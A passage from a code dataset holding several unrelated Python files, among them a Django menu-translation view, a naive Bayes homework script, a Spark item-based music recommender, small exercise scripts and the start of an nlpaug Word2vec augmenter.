case this method\n # will return a sequence of results for each text.\n n_text = len(text)\n # print(n_text)\n num_executions = math.ceil(n_text / 120)\n # print(num_executions)\n for i in range(0, num_executions):\n # print(i)\n pos = i * 120\n # print(pos)\n end_pos = pos + 120\n if (pos + 120) > n_text:\n end_pos = n_text\n else:\n end_pos = pos + 120\n # print(end_pos)\n text_to_translate = text[(pos):(end_pos)]\n result = translate_client.translate(\n text_to_translate, target_language=target\n )\n # print(result)\n for t in result:\n result_text.append(t[\"translatedText\"])\n\n return result_text\n\n\ndef translate_text(target, text):\n \"\"\"Translates text into the target language.\n\n Target must be an ISO 639-1 language code.\n See https://g.co/cloud/translate/v2/translate-reference#supported_languages\n \"\"\"\n\n translate_client = translate.Client()\n\n if isinstance(text, six.binary_type):\n text = text.decode(\"utf-8\")\n\n # Text can also be a sequence of strings, in which case this method\n # will return a sequence of results for each text.\n result = translate_client.translate(text, target_language=target)\n\n return result[\"translatedText\"]\n\n\ndef draw_boxes(image, bounds, color):\n \"\"\"Draw a border around the image using the hints in the vector list.\"\"\"\n draw = ImageDraw.Draw(image)\n\n aux = 0\n for bound in bounds:\n if aux != 0:\n draw.polygon([\n bound.vertices[0].x, bound.vertices[0].y,\n bound.vertices[1].x, bound.vertices[1].y,\n bound.vertices[2].x, bound.vertices[2].y,\n bound.vertices[3].x, bound.vertices[3].y],\n fill=(255, 255, 255, 128), outline=color\n )\n aux = 1\n return image\n\n\ndef draw_text(image, bounds, texts, color):\n \"\"\"Draw text in the image \"\"\"\n draw = ImageDraw.Draw(image)\n\n aux = 0\n for bound in bounds:\n if (aux != 0):\n draw.text(\n (bound.vertices[0].x, bound.vertices[0].y),\n str(texts[aux]).encode('utf-8'),\n fill=\"black\", anchor=\"ms\"\n )\n aux += 1\n\n return image\n\n\ndef get_document_bounds(image_file, feature, lang):\n \"\"\"Returns document bounds given an image.\"\"\"\n client = vision.ImageAnnotatorClient()\n\n bounds = []\n texts = []\n texts_ = []\n translates = []\n\n with io.open(image_file, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.Image(content=content)\n\n response = client.document_text_detection(image=image)\n datas = response.text_annotations\n\n # general_description = datas[0].description\n # print(datas)\n # print(general_description)\n\n # translate_text_print(lang, general_description)\n\n for text in datas:\n texts_.append(text.description)\n texts.append(text.description)\n bounds.append(text.bounding_poly)\n\n translates = translate_all_text(lang, texts_)\n\n # The list `bounds` contains the coordinates of the bounding boxes.\n return bounds, texts, translates\n\n\ndef render_doc_text(filein, fileout, lang):\n image = Image.open(filein)\n bounds, texts, translates = get_document_bounds(\n filein, FeatureType.WORD, lang\n )\n draw_boxes(image, bounds, 'yellow')\n draw_text(image, bounds, translates, 'yellow')\n\n if fileout != 0:\n image.save(fileout)\n else:\n image.show()\n return translates, texts\n\n\nclass MenuViewSet(viewsets.ModelViewSet):\n \"\"\"Manage menu in the database\"\"\"\n serializer_class = serializers.MenuImageSerializer\n queryset = Menu.objects.all()\n\n @action(methods=['POST'], detail=False, url_path='upload')\n def upload(self, request):\n serializer = self.get_serializer(\n data=request.data\n )\n\n if serializer.is_valid():\n # print(request.data)\n serializer.save()\n # print(serializer.data['id'])\n\n image_ = Menu.objects.get(id=serializer.data['id'])\n image_path = image_.image.path\n image_name = image_.image.name\n\n lang = serializer.data['lang']\n\n # print(image_path)\n # print(image_name)\n\n r_lang, r_text = render_doc_text(\n image_path, MEDIA_ROOT + '/' + image_name, lang\n )\n\n image_.description = r_lang[0]\n image_.original = r_text[0]\n image_.save()\n\n seria = serializers.MenuImageSerializer(image_)\n\n return Response(\n seria.data,\n status=status.HTTP_200_OK\n )\n\n return Response(\n serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n","sub_path":"apps/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"501158976","text":"#-------------------------------------------------------------------------\r\n# AUTHOR : Andy Vu\r\n# FILENAME : naive_bayes.py\r\n# SPECIFICATION : Outputs the classification of each test instance if the\r\n# classification confidence is >= 0.75\r\n# FOR : CS 4210 - Assignment #2\r\n# TIME SPENT : 02/27/2021-02/28/2021\r\n#-----------------------------------------------------------*/\r\n\r\n# IMPORTANT NOTE: DO NOT USE ANY ADVANCED PYTHON LIBRARY TO COMPLETE THIS CODE SUCH AS numpy OR pandas. You have to work here only with standard vectors and arrays\r\n\r\n# importing some Python libraries\r\nimport csv\r\nfrom sklearn.naive_bayes import GaussianNB\r\n\r\n# reading the training data\r\n# --> add your Python code here\r\nweatherTraining = []\r\nwith open('weather_training.csv', 'r') as csvfile:\r\n reader = csv.reader(csvfile)\r\n for i, row in enumerate(reader):\r\n if i > 0: # skipping the header\r\n weatherTraining.append(row)\r\n\r\n# transform the original training features to numbers and add to the 4D array X.\r\n# For instance Sunny = 1, Overcast = 2, Rain = 3, so X = [[3, 1, 1, 2], [1, 3, 2, 2], ...]]\r\n# --> add your Python code here\r\n# Day : Sunny = 1, Overcast = 2, Rain = 3\r\n# Temperature: Hot = 1, Mild = 2, Cool = 3\r\n# Humidity : High = 1, Normal = 2\r\n# Wind : Weak = 1, Strong = 2\r\nX = []\r\nfor row in weatherTraining:\r\n temp = []\r\n for i in range(1, 5):\r\n if row[i] == \"Sunny\" or row[i] == \"Hot\" or row[i] == \"High\" or row[i] == \"Weak\":\r\n temp.append(1)\r\n elif row[i] == \"Overcast\" or row[i] == \"Mild\" or row[i] == \"Normal\" or row[i] == \"String\":\r\n temp.append(2)\r\n else:\r\n temp.append(3)\r\n X.append(temp)\r\n\r\n# transform the original training classes to numbers and add to the vector Y.\r\n# For instance Yes = 1, No = 2, so Y = [1, 1, 2, 2, ...]\r\n# --> add your Python code here\r\nY = []\r\nfor row in weatherTraining:\r\n if row[-1] == \"Yes\":\r\n Y.append(1)\r\n else:\r\n Y.append(2)\r\n\r\n# fitting the naive bayes to the data\r\nclf = GaussianNB()\r\nclf.fit(X, Y)\r\n\r\n# reading the data in a csv file\r\n# --> add your Python code here\r\nweatherTest = []\r\nwith open('weather_test.csv', 'r') as csvfile:\r\n reader = csv.reader(csvfile)\r\n for i, row in enumerate(reader):\r\n if i > 0: # skipping the header\r\n weatherTest.append(row)\r\nX_test = []\r\nfor row in weatherTest:\r\n temp = []\r\n for i in range(1, 5):\r\n if row[i] == \"Sunny\" or row[i] == \"Hot\" or row[i] == \"High\" or row[i] == \"Weak\":\r\n temp.append(1)\r\n elif row[i] == \"Overcast\" or row[i] == \"Mild\" or row[i] == \"Normal\" or row[i] == \"String\":\r\n temp.append(2)\r\n else:\r\n temp.append(3)\r\n X_test.append(temp)\r\n\r\n# printing the header os the solution\r\nprint(\"Day\".ljust(15) + \"Outlook\".ljust(15) + \"Temperature\".ljust(15) + \"Humidity\".ljust(15) + \"Wind\".ljust(15) + \"PlayTennis\".ljust(15) + \"Confidence\".ljust(15))\r\n\r\n# use your test samples to make probabilistic predictions.\r\n# --> add your Python code here\r\n# -->predicted = clf.predict_proba([[3, 1, 2, 1]])[0]\r\npredictions = clf.predict(X_test)\r\nfor i, row in enumerate(X_test):\r\n confidence = clf.predict_proba([row])[0]\r\n # Yes == 1\r\n if confidence[0] >= 0.75 and predictions[i] == 1:\r\n print(weatherTest[i][0].ljust(15) + weatherTest[i][1].ljust(15) + weatherTest[i][2].ljust(15) + weatherTest[i][3].ljust(15) + weatherTest[i][4].ljust(15) + \"Yes\".ljust(15) + str(confidence[0]).ljust(15))\r\n","sub_path":"Assignment 2/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"271157987","text":"import pickle\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mne.stats import spatio_temporal_cluster_1samp_test\n\nfrom gat.plot import (plot_widths, plot_gat_times, plot_mean_pred)\n\nfrom scripts.config import (\n epochs_params,\n passive, active,\n scorer_spearman\n)\n\n# Apply contrast on each type of epoch\nep = epochs_params[0]\n\n\nanalysis = dict(name='ambiguities_regress', key='stim_category',\n include=active, exclude=passive,\n contrast='stim_category', generalization='ambiguity',\n scorer=scorer_spearman, chance=0.)\n\n# pkl_fname = 'data/ambiguity/MEG/fsaverage/stim_lock-decod_ambiguity.pickle_score.pickle'\n# with open(pkl_fname, 'r') as f:\n# scores, gat, events_list = pickle.load(f)\n\n\ndef load_scores(ep_name='stim_lock', decim=2):\n pkl_fname = 'data/ambiguity/MEG/fsaverage/' + ep_name + '-decod_ambiguities_avg.pickle'\n with open(pkl_fname, 'r') as f:\n y_preds, scores, gat, events_list = pickle.load(f)\n y_preds = np.array(y_preds)[:, ::decim, ::decim, :, :]\n scores = np.array(scores)[:, ::decim, ::decim]\n\n gat_list = list()\n for score, y_pred in zip(scores, y_preds):\n gat_ = copy.deepcopy(gat)\n gat_.scores_ = np.array(score)\n gat_.y_pred_ = np.array(y_pred)\n gat_.y_pred_ = gat_.y_pred_\n gat_.scores_ = gat_.scores_\n gat_.train_times_['step'] *= decim\n gat_.test_times_['step'] *= decim\n gat_.train_times_['times'] = gat_.train_times_['times'][::decim]\n gat_.test_times_['times'] = gat_.test_times_['times'][::decim]\n for idx in range(len(gat_.test_times_['times'])):\n gat_.test_times_['times'][idx] = gat_.test_times_['times'][idx][::decim]\n gat_.y_train_ = np.linspace(0, 1, 8)\n gat_.train_times_['slices'] = gat_.train_times_['slices'][::decim]\n gat_.test_times_['slices'] = gat_.test_times_['slices'][::decim]\n for idx in range(len(gat_.test_times_['slices'])):\n gat_.test_times_['slices'][idx] = gat_.test_times_['slices'][idx][::decim]\n gat_list.append(gat_)\n\n ## run part of run_stats_decoding.p\n return gat_list, events_list, analysis\n","sub_path":"sandbox/decoding/load_some_scores.py","file_name":"load_some_scores.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"214742765","text":"deck = []\ndeck += [Neonate] * 4\ndeck += [Bloodghast] * 4\ndeck += [Amalgam] * 4\ndeck += [Imp] * 4\ndeck += [Troll] * 4\ndeck += [Thug] * 1\ndeck += [Narco] * 4\ndeck += [Looting] * 4\ndeck += [Voice] * 4\ndeck += [Loam] * 3\ndeck += [Conflagrate] * 3\ndeck += [Fetch] * 5\ndeck += [Gorge] * 4\ndeck += [Mountain] * 3\ndeck += [Salvage] * 2\ndeck += [Crypt] * 2\ndeck += [Stomping] * 2\ndeck += [Gemstone] * 3\n\nassert len(deck) == 60\n\n\nrandom.shuffle(deck)\n","sub_path":"dredge/dredge.py","file_name":"dredge.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"515163183","text":"from lastfm_dataset_1K_preprocess import *\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.recommendation import ALS\nfrom pyspark.sql import Row\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.window import Window\nimport pyspark.sql.functions as sf\nfrom pyspark.sql.functions import col\nfrom history_subset import *\nfrom pyspark.ml.feature import VectorAssembler, MinHashLSH\nfrom pyspark.ml.feature import BucketedRandomProjectionLSH\nfrom pyspark.mllib.linalg import Vectors\nfrom pyspark.ml.linalg import SparseVector\nfrom pyspark.sql.types import FloatType\nfrom scipy.spatial import distance\nfrom sklearn.metrics import pairwise_distances\n\n\n\n# 1. loading training subset \"lastfm_dataset/top_20_Percent_song_fractional_intID_history.parquet\"\n# 2. generate user-item matrix\n# 3.\nclass item_based_recommentdation(object):\n spark = init_spark(object)\n df = None\n training = None\n test = None\n train_matrix = None\n test_matrix = None\n model = None\n\n\n def init_spark(self):\n spark = SparkSession \\\n .builder \\\n .appName(\"Python Spark SQL basic example\") \\\n .config(\"spark.some.config.option\", \"some-value\") \\\n .getOrCreate()\n return spark\n\n\n def generate_user_items_model(self):\n self.df = spark.read.parquet(\"lastfm_dataset/top_20_Percent_song_fractional_intID_history.parquet\")\n (self.training, self.test) = self.df.randomSplit([0.8, 0.2], seed=100)\n\n self.train_matrix = self.get_matrix(self.training)\n\n # 根据test set 整理出一个song matrix vector*n\n self.test = spark.read.parquet(\"lastfm_dataset/test_5000.parquet\")\n self.test.groupby('id_user').count().show()\n\n # self.test_matrix = self.get_matrix(self.test)\n # test 应该从train_matrix中找到相应track的 id\n self.test_matrix = self.train_matrix.join(self.test,['id_track']).select('id_track','features')\n print(\"test matrix\")\n self.test_matrix.show();\n\n # 1.如果test set 补全在train set中会不会有影响\n brp = BucketedRandomProjectionLSH(inputCol=\"features\", outputCol=\"hashes\", bucketLength=2.0,\n numHashTables=3)\n self.model = brp.fit(self.train_matrix)\n\n\n\n\n def get_matrix(self,df):\n limitation = 8\n # pair(id_track,(id_user,count))\n # option1: vector用count构造\n rdd = df.rdd.filter(lambda x: x['count'] > limitation).map(lambda x: (x.id_track, [(x.id_user, x['count'])]))\n # option2: vector用0/1构造\n #rdd = df.rdd.map(lambda x: (x.id_track, [(x.id_user, 1)]))\n # pair(id_track,[(id_user,fractional_count),(id_user,fractional_count)])\n rdd = rdd.reduceByKey(lambda a, b: a + b)\n print(rdd.first())\n # rdd = rdd.map(lambda x: (x[0], SparseVector(len(x[1]), x[1])))\n # 最多有1000个user,设定vector为1000dim,id_user取值范围「0-999」,(id_user,count)即可用来表示SparseVector,第id_user的值为count。\n rdd = rdd.map(lambda x: (x[0], SparseVector(1000, x[1])))\n matrix = spark.createDataFrame(rdd, ['id_track', 'features'])\n return matrix\n\n # user_df = get_user_items(train_df, train_matrix, id_user)\n def get_user_items(self,history_df, matrix_df, userid):\n user_df = history_df.filter(history_df['id_user'] == userid).select('id_user', 'id_track', 'count')\n matrix_df = matrix_df.join(user_df, ['id_track'])\n matrix_df.show()\n return matrix_df\n\n def get_test_all_user_items_pair(self, train_df, train_maxtrix, test_df):\n # 选取test集中所有用户的历史数据\n # 选出每个user 在training set的listening history\n # ()\n train_df = train_df.alias(\"a\").join(\n test_df.alias(\"b\"), ['id_user']).select('a.id_user','a.id_track','a.count','a.fractional_count').distinct()\n\n # 历史数据加上feature\n matrix_df = train_df.join(train_maxtrix, ['id_track'])\n print(\"get_test_all_user_items_pair\")\n matrix_df.show()\n # +--------+-------+-----+--------------------+\n # |id_track|id_user|count| features|\n # +--------+-------+-----+--------------------+\n # | 29| 830| 12|(1000,[30,72,73,8...|\n return matrix_df\n\n\n def get_score(self,sim_df, train_df, id_user):\n # sim_df : id,sim\n id_track_list = sim_df.select(\"id_track\").rdd.flatMap(lambda x: x).collect()\n user_track_df = train_df.filter((train_df.id_user == id_user) & (col('id_track').isin(id_track_list)))\n full_df = sim_df.join(user_track_df, ['id_track'], how='left')\n score = full_df.withColumn('score', 1/col('distCol') * col('count')).agg(avg(col('score')))\n # user_track_df.show()\n # full_df.show()\n # score.show()\n score = score.rdd.flatMap(lambda x: x).collect()[0]\n # print(score)\n return score\n\n\n def get_predcit_single_user(self, id_user, train_df, train_matrix, test_matrix):\n\n user_df = self.get_user_items(train_df, train_matrix, id_user)\n similar = self.model.approxSimilarityJoin(user_df, test_matrix, 1000, \"JaccardDistance\")\n items_similarity = pairwise_distances(train_matrix.T, metric='cosine')\n similar = similar.select(col('datasetA.id_user').alias('id_user'),\n col('datasetA.id_track').alias('user_listen'),\n col('datasetA.count').alias('count'),\n col('datasetB.id_track').alias('test_song'),\n col('distCol')).where(col('user_listen') != col('test_song'))\n window = Window.partitionBy('test_song').orderBy('distCol')\n # select top k similar songs\n similar = similar.select('*', rank().over(window).alias('rank')).filter(col('rank') <= 5)\n # id_user|user_listen|count|test_song| distCol|rank|\n # 19| 20608| 1| 4590| 7.0| 1|\n # 19| 20927| 4| 4590| 8.306623862918075| 2|\n return similar\n\n similar.show()\n\n\n\n def get_predcit_multiple_users(self):\n # train_df, train_matrix, test_matrix, test\n # computer the similarity for all of test track for each user on one go\n all_user_history_df = self.get_test_all_user_items_pair(self.training, self.train_matrix, self.test)\n track_num = self.test.select('id_track').distinct().count()\n user_num = self.test.select('id_user').distinct().count()\n print(\"track_num: %d\" % track_num)\n print(\"user_num: %d\" % user_num)\n\n\n similar = self.model.approxSimilarityJoin(all_user_history_df, self.test_matrix, 1000, distCol=\"JaccardDistance\")\n\n similar = similar.select(col('datasetA.id_user').alias('id_user'),\n col('datasetA.id_track').alias('user_listen'),\n col('datasetA.count').alias('count'),\n col('datasetA.fractional_count').alias('fractional_count'),\n col('datasetB.id_track').alias('test_song'),\n # col('distCol')\n col('JaccardDistance').alias('distCol')\n ).where(col('user_listen') != col('test_song'))\n\n # similar.write.parquet(\"model/similar_matrix_5000test_jaccard.parquet\")\n\n window = Window.partitionBy('id_user', 'test_song').orderBy('distCol')\n similar = similar.select('*', rank().over(window).alias('rank')).filter(col('rank') <= 5)\n # id_user|user_listen|count|test_song| distCol|rank|\n # 19| 20608| 1| 4590| 7.0| 1|\n # 19| 20927| 4| 4590| 8.306623862918075| 2|\n print(similar.count())\n\n similar.show()\n score_df = similar.withColumn('similar', (1-col('distCol')))\n score_df = score_df.withColumn('score_temp', col('similar') * col('count'))\n score_df = score_df.groupby('id_user', 'test_song').agg(sum('score_temp').alias('sum_score'),sum((col('similar'))).alias('sum_similar'))\n score_df = score_df.withColumn('score', col('sum_score') / col('sum_similar'))\n score_df.show()\n print(score_df.count())\n\n score_df.sort('id_user').show()\n self.evaluate(score_df, self.test)\n\n return similar\n\n\n def evaluate(self,predictions, test_df):\n # predictions mark the the songs not be listened\n rank = predictions.withColumn('rank', row_number().over(Window.partitionBy('id_user').orderBy(desc('score'))))\n\n cond = [rank.id_user == test_df.id_user, rank.test_song == test_df.id_track]\n # 展开 test df,\n predictions = rank.join(test_df, cond, how='left').drop(test_df.id_user).fillna(0)\n\n\n print(\"MPR step 1\")\n print(predictions.count())\n # test1.filter(test1['id_user'] == 26).show()\n listend_song = predictions.where(col('count') > 0).groupby('id_user').agg(count('*').alias('listened_song'))\n nolistend_song = predictions.where(col('count') == 0).groupby('id_user').agg(count('*').alias('not_listened'))\n listend_song.join(nolistend_song, on=['id_user']).show()\n\n # predictions.where(col('id_user') == 498).sort(col(\"rank\")).show()\n # predictions.where(col('id_user') == 754).sort(col(\"rank\")).show()\n # predictions.where(col('id_user') == 443).sort(col(\"rank\")).show()\n # predictions.where(col('id_user') == 304).sort(col(\"rank\")).show()\n # predictions.where(col('id_user') == 871).sort(col(\"rank\")).show()\n # predictions.where(col('id_user') == 181).sort(col(\"rank\")).show()\n # predictions.where(col('id_user') == 621).sort(col(\"rank\")).show()\n\n n_tracks = test_df.select('id_track').distinct().count()\n # predictions.withColumn('rank', row_number().over(Window.partitionBy('id_user').orderBy(desc('score'))))\n\n MPR = predictions\\\n .where(col('fractional_count') > 0) \\\n .groupby('id_user') \\\n .agg(\n count('*').alias('n'),\n sum(1 - col('score')).alias('sum_pred'),\n sum(col('rank') / n_tracks).alias('sum_perc_rank'),\n min('rank').alias('min_rank')\n ) \\\n .agg(\n (sum('sum_pred') / sum('n')).alias('avg 1-score'),\n (sum('sum_perc_rank') / sum('n')).alias('MPR'), # the lower the better\n mean(1 / col('min_rank')).alias('MRR') # the higher the better\n ) \\\n .withColumn('MPR*k', col('MPR') * n_tracks) \\\n .withColumn('1/MRR', 1 / col('MRR'))\n\n MPR.show()\n\n\n predictions = predictions.select('id_user', 'test_song', 'rank', 'track_id', 'count')\n predictions.where(col('id_user') == 498).sort(col(\"rank\")).show()\n predictions.where(col('id_user') == 385).sort(col(\"rank\")).show()\n predictions.where(col('id_user') == 193).sort(col(\"rank\")).show()\n predictions.where(col('id_user') == 181).sort(col(\"rank\")).show()\n predictions.where(col('id_user') == 968).sort(col(\"rank\")).show()\n predictions.where(col('id_user') == 39).sort(col(\"rank\")).show()\n\n\n\n def load_and_evalaute_similar_matrix(self):\n\n similar = spark.read.parquet(\"model/similar_matrix_5000test_jaccard.parquet\")\n\n window = Window.partitionBy('id_user', 'test_song').orderBy('distCol')\n\n similar = similar.select('*', rank().over(window).alias('rank')).filter(col('rank') <= 5)\n # id_user|user_listen|count|test_song| distCol|rank|\n # 19| 20608| 1| 4590| 7.0| 1|\n # 19| 20927| 4| 4590| 8.306623862918075| 2|\n print(similar.count())\n similar.show()\n score_df = similar.withColumn('similar', (1-col('distCol')))\n score_df = score_df.withColumn('score_temp', col('similar') * col('count'))\n score_df = score_df.groupby('id_user', 'test_song').agg(sum('score_temp').alias('sum_score'),sum((col('similar'))).alias('sum_similar'))\n score_df = score_df.withColumn('score', col('sum_score') / col('sum_similar'))\n score_df.show()\n print(score_df.count())\n\n score_df.sort('id_user').show()\n self.evaluate(score_df, self.test)\n\n\n\n\nmodel = item_based_recommentdation()\n\nmodel.generate_user_items_model()\n\n# # train a new model\n# model.get_predcit_multiple_users()\n\n# loading from model file\nmodel.load_and_evalaute_similar_matrix()\n","sub_path":"item_based_recommentdation.py","file_name":"item_based_recommentdation.py","file_ext":"py","file_size_in_byte":12604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403723771","text":"\"\"\"\nproblem3\n---\nThe prime factors of 13195 are 5, 7, 13 and 29.\nWhat is the largest prime factor of the number 600851475143 ?\n\"\"\"\nimport math\n\ndef is_prime(q):\n q = abs(q)\n if q == 2: return True\n if q < 2 or q&1 == 0: return False\n return pow(2, q-1, q) == 1\n\nif __name__ == '__main__':\n N = 600851475143\n\n begin_num = 2\n end_num = math.ceil(math.sqrt(N))\n\n processing_data = [i for i in range(begin_num, end_num) if (i%2!=0) and (i%3!=0) and (i%5!=0) and is_prime(i)]\n\n n = max(filter(lambda i: N%i == 0, processing_data))\n print(n)","sub_path":"src/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191703847","text":"def myPrice():\n global buah\n harga = list(buah.values())\n harga.sort(reverse=True)\n mahal = harga[0]\n for buah, harga in buah.items():\n if harga == mahal:\n return buah\n\nbuah = {'apel' : 5000, 'jeruk' : 8500, 'mangga' : 7800, 'duku' : 6500}\nprint(myPrice())\n","sub_path":"Chapter 8/Python Project 7.py","file_name":"Python Project 7.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"203192951","text":"## ---------------------------- ##\n## \n## aileen_benedict.py\n## 09.29.2018\n##\n## Train an image classifier to classify images by number of fingers.\n##\n## ---------------------------- ##\n\n\nimport numpy as np\n#It's kk to import whatever you want from the local util module if you would like:\n#from util.X import ... \n\ndef count_fingers(im):\n '''\n Example submission for coding challenge. \n \n Args: im (nxm) unsigned 8-bit grayscale image \n Returns: One of three integers: 1, 2, 3\n \n '''\n \n # Pad images first since images are cropped and not the same size\n padded = np.zeros((70,50))\n x_offset = int(np.ceil((padded.shape[0] - im.shape[0]) / 2))\n y_offset = int(np.ceil((padded.shape[1] - im.shape[1]) / 2))\n # When padding, put original image in the middle-ish\n padded[x_offset:im.shape[0]+x_offset,y_offset:im.shape[1]+y_offset] = im\n\n teehee = padded.ravel()\n\n # Now use if statements from my decision tree thingy :D~\n if teehee[1075] <= 24.5:\n return 1\n elif teehee[1082] <= 71.0:\n return 2\n else:\n return 3\n","sub_path":"2. Learning to See/challenge/aileen_benedict.py","file_name":"aileen_benedict.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"525315209","text":"import sys, time\nfrom hbdm_encodeV5 import get_chunk_info\nfrom hbdm_decodeV4 import read_encoded, decode\nfrom chunk_fileV3_1 import chunk\n\n# https://rosettacode.org/wiki/Longest_Common_Substring#Python on 19/08/15\n\ndef lcs_str(f1, f2):\n\ts1 = read_encoded(f1)\n\ts2 = read_encoded(f2)\n\tlen1, len2 = len(s1), len(s2)\n\tir, jr = 0, 0\n\tfor i1 in range(len1):\n\t i2 = s2.find(s1[i1])\n\t while i2 >= 0:\n\t j1, j2 = i1+1, i2+1\n\t while j1 < len1 and j2 < len2 and s2[j2] == s1[j1]:\n\t if j1-i1 > jr-ir:\n\t ir, jr = i1, j1\n\t j1 += 1; j2 += 1\n\t i2 = s2.find(s1[i1], i2+1)\n\tprint (s1[ir:jr+1])\n\ndef lcs(f1, f2):\n\ts1 = read_encoded(f1)\n\ts2 = read_encoded(f2)\n\tlen1, len2 = len(s1), len(s2)\n\tir, jr = 0, 0\n\tfor i1 in range(len1):\n\t\tif s1[i1] in s2:\n\t\t\ti2 = s2.index(s1[i1])\n\t\t\t#i2 = s2.find(s1[i1])\n\t\t\twhile i2 >= 0:\n\t\t\t\tj1, j2 = i1+1, i2+1\n\t\t\t\twhile j1 < len1 and j2 < len2 and s2[j2] == s1[j1]:\n\t\t\t\t\tif j1-i1 > jr-ir:\n\t\t\t\t\t\tir, jr = i1, j1\n\t\t\t\t\tj1 += 1; j2 += 1\n\t\t\t\ttry:\n\t\t\t\t\ti2 = s2.index(s1[i1], i2+1)\n\t\t\t\tfinally:\n\t\t\t\t\tbreak\n\tresult = s1[ir:jr+1]\n\twrite_file('lcsstr.data.encoded', result)\n\ndef write_file(filename, content):\n file = open(filename, 'wb')\n\n for pair in content:\n file.write(pair)\n\n file.close()\n\n\ndef main():\n\tlcs(sys.argv[1], sys.argv[2])\n\nif __name__ == \"__main__\":\n main()","sub_path":"lcsstr.py","file_name":"lcsstr.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"500070370","text":"#Estrutura de repetição while\r\n\r\nc = 1\r\npar = inpar = 0\r\nwhile c != 0:\r\n c = int(input('Digite um número? : '))\r\n if c != 0:\r\n if c % 2 == 0:\r\n par += 1\r\n else:\r\n inpar += 1\r\nprint('Vc digitou {} números PARES e {} INPARES'.format(par, inpar))","sub_path":"mark87.py","file_name":"mark87.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"275379073","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import models, api\n\n\nclass BillableExpenseReport(models.AbstractModel):\n _inherit = 'billable.expense.report'\n\n @api.multi\n def open_purchase_expense(self, options, params=None):\n if not params:\n params = {}\n ctx = self.env.context.copy()\n ctx.pop('id', '')\n expense_id = params.get('id')\n document = params.get('object', 'purchase.order')\n if expense_id:\n expense = self.env['billable.expenses'].browse(expense_id)\n purchase_id = expense.purchase_id.id\n view_id = self.env['ir.model.data'].get_object_reference('purchase', 'purchase_order_form')[1]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'tree',\n 'view_mode': 'form',\n 'views': [(view_id, 'form')],\n 'res_model': document,\n 'view_id': view_id,\n 'res_id': purchase_id,\n 'context': ctx,\n }\n","sub_path":"src/custom/purchase_billable_expense/report/billable_expense_report.py","file_name":"billable_expense_report.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"279188882","text":"class Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n if nums == None:\n return 0\n j = 0\n while j < len(nums):\n if nums[j] == val:\n del nums[j]\n else:\n j += 1\n return len(nums)\n","sub_path":"python/removeElement.py","file_name":"removeElement.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"193684191","text":"n1 = 1\nresults = [1]\nlimit = 10000\ndigits = 999\nfor n in range (1,limit):\n results.append(n1)\n n1 = n1 + results[n-1]\n if len(str(results[n])) > digits:\n print(results[n])\n print(\"Index\", n+1)\n exit()\n\n","sub_path":"Euler_25.py","file_name":"Euler_25.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"309763919","text":"\"\"\"\n Augmenter that apply word2vec's based operation to textual input.\n\"\"\"\n\nfrom nlpaug.augmenter.word import WordEmbsAugmenter\nfrom nlpaug.util import Action\nimport nlpaug.model.word_embs as nmw\nfrom nlpaug.util.decorator.deprecation import deprecated\n\nWORD2VEC_MODEL = None\n\n\ndef init_word2vec_model(model_path, force_reload=False):\n \"\"\"\n Load model once at runtime\n \"\"\"\n global WORD2VEC_MODEL\n if WORD2VEC_MODEL and not force_reload:\n return WORD2VEC_MODEL\n\n word2vec = nmw.Word2vec()\n word2vec.read(model_path)\n WORD2VEC_MODEL = word2vec\n\n return WORD2VEC_MODEL\n\n\n@deprecated(deprecate_from='0.0.7', deprecate_to='0.0.9', msg=\"Use WordEmbsAug from 0.0.7 version\")\nclass Word2vecAug(WordEmbsAugmenter):\n \"\"\"\n Augmenter that leverage word2vec's embeddings to find top n similar word for augmentation.\n\n :param str model_path: Downloaded model directory. Either model_path or model is must be provided\n :param obj model: Pre-loaded model\n :param str action: Either 'insert or 'substitute'. If value is 'insert', a new word will be injected to random\n position according to word embeddings calculation. If value is 'substitute', word will be replaced according\n to word embeddings calculation\n :param int aug_min: Minimum number of word will be augmented.\n :param float aug_p: Percentage of word will be augmented.\n :param int aug_n: Top n similar word for lucky draw\n :param list stopwords: List of words which will be skipped from augment operation.\n :param func tokenizer: Customize tokenization process\n :param func reverse_tokenizer: Customize reverse of tokenization process\n :param bool force_reload: If True, model will be loaded every time while it takes longer time for initialization.\n :param str name: Name of this augmenter\n\n >>> import nlpaug.augmenter.word as naw\n >>> 